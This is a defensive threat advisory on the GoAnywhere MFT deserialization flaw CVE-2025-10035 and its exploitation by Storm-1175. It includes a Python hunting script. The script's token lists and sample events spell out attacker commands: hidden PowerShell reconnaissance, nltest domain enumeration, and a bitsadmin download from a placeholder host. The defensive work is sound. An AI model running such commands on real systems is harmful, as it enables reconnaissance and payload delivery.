CVE-2025-10035 in GoAnywhere MFT Actively Targeted by Storm-1175

In late September 2025, a severe remote code execution vulnerability was disclosed in Fortra’s GoAnywhere Managed File Transfer (MFT) platform. Within days of disclosure, Microsoft Threat Intelligence observed active exploitation by the threat actor group Storm-1175, a cybercriminal entity associated with Medusa ransomware. This campaign represents a continuation of adversarial targeting of file transfer and data management systems, exploiting public-facing applications for initial access.

Severity: Critical

Vulnerability Exploited: CVE-2025-10035

  • Type: Deserialization to Remote Code Execution (RCE)
  • Component Affected: License Servlet Admin Console (GoAnywhere MFT ≤ v7.8.3)
  • CVSS Score: 10.0
  • Attack Vector: Remote / Unauthenticated
  • Description: The vulnerability allows attackers to bypass digital signature verification by crafting a forged license response, enabling arbitrary object deserialization. Once exploited, attackers can execute arbitrary commands, drop payloads, and maintain persistence on vulnerable servers.

Threat Actor: Storm-1175

Microsoft attributed the campaign to Storm-1175, an established financially motivated threat group known for:

  • Deploying Medusa ransomware in post-compromise environments
  • Leveraging public-facing application vulnerabilities for initial access
  • Using remote monitoring and management (RMM) tools such as SimpleHelp and MeshAgent for persistence and C2 communication

Storm-1175’s tactics mirror those seen in previous GoAnywhere exploitation campaigns (e.g., CVE-2023-0669), underscoring their operational expertise in targeting managed file transfer technologies.

Attack Details: Storm-1175 Exploitation Activity

  • Timeline: Exploitation activity was observed on September 11, 2025, targeting multiple organizations.
  • Entry Point: The threat actor exploited a zero-day deserialization flaw (CVE-2025-10035) in GoAnywhere MFT, allowing remote code execution without authentication.
  • Persistence: After gaining access, they installed RMM tools (SimpleHelp and MeshAgent) under the GoAnywhere process and created malicious .jsp web shells to maintain control.
  • Discovery & Lateral Movement: The attackers ran system and network scans (whoami, systeminfo, netscan) and used mstsc.exe (RDP) for lateral movement across the network.
  • Command & Control: They maintained encrypted C2 communication through Cloudflare tunnels and RMM tool connections.
  • Exfiltration: Rclone was used to exfiltrate data from compromised systems.
  • Impact: In at least one case, the attack ended with Medusa ransomware deployment, encrypting files and disrupting operations.

Recommendations

  1. Upgrade GoAnywhere MFT immediately to a fixed version.
  2. Ensure the GoAnywhere Admin Console is not exposed publicly to the internet.
  3. Monitor for PowerShell execution from the GoAnywhere Tomcat process — specifically powershell.exe spawned from \GoAnywhere\ paths containing enumeration, credential, or download commands such as whoami, systeminfo, net user, Invoke-WebRequest, or FromBase64String. These indicate possible post-exploitation or reconnaissance activity linked to CVE-2025-10035.
  4. Detect command-line activity where cmd.exe originates from the GoAnywhere Tomcat process executing utilities like powershell.exe, rundll32.exe, bitsadmin, or wget, or issuing commands such as nltest /dclist or net user /add. Such behavior strongly suggests lateral movement, persistence creation, or payload delivery following GoAnywhere exploitation.
  5. Block the IOCs at their respective controls:
    https://www.virustotal.com/gui/collection/58169a0111510a82fb596ac8b37c90992cb4e975180c67f1cf503580b4fa82ec/iocs
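Recommendations 3 and 4 can be turned into a process-creation rule; the script below is an added example (not code from this advisory, Microsoft or Fortra) that applies both checks to constructed Sysmon-style records. The GoAnywhere Tomcat parent path, the field names and every sample command line are assumptions, included only to show which events fire and which stay silent.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / EDR style fields, assumed)."""
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process

# Scope from the advisory: children spawned from a \GoAnywhere\ path (embedded Tomcat).
GOANYWHERE_PARENT = re.compile(r"\\goanywhere\\", re.IGNORECASE)
# Recommendation 3: enumeration, credential and download tokens inside powershell.exe.
PS_TOKENS = ("whoami", "systeminfo", "net user", "invoke-webrequest", "frombase64string")
# Recommendation 4: utilities and commands issued through cmd.exe.
CMD_TOKENS = ("powershell.exe", "rundll32.exe", "bitsadmin", "wget",
              "nltest /dclist", "net user /add")

def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection label for the event, or None when neither rule matches."""
    if not GOANYWHERE_PARENT.search(ev.parent_image):
        return None  # parent is not the GoAnywhere Tomcat process: out of scope
    image = ev.image.rsplit("\\", 1)[-1].lower()
    cmd = ev.command_line.lower()
    if image == "powershell.exe" and any(t in cmd for t in PS_TOKENS):
        return "goanywhere_powershell_recon"
    if image == "cmd.exe" and any(t in cmd for t in CMD_TOKENS):
        return "goanywhere_cmd_persistence_or_lateral"
    return None

def hunt(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """Apply classify() to every event and return (image, label) for each hit."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((ev.image, label))
    return hits

# Constructed sample telemetry; paths and command lines are illustrative only.
TOMCAT = r"C:\Program Files\Fortra\GoAnywhere\tomcat\bin\java.exe"  # assumed parent path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(TOMCAT, PS, 'powershell.exe -nop -w hidden -c "whoami; systeminfo"'),
    ProcEvent(TOMCAT, r"C:\Windows\System32\cmd.exe", "cmd.exe /c nltest /dclist:"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -c whoami"),   # benign parent: no hit
    ProcEvent(TOMCAT, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir C:\\GoAnywhere\\userdata"),  # no token
    ProcEvent(TOMCAT, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c bitsadmin /transfer job http://placeholder.invalid/x C:\\Windows\\Temp\\x"),
]

if __name__ == "__main__":
    for image, label in hunt(SAMPLE_EVENTS):
        print(f"{label}: {image}")
```

Tune the token lists to your environment before deploying; the parent-path check is what keeps ordinary administrative PowerShell use from firing.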

Ampcus Cyber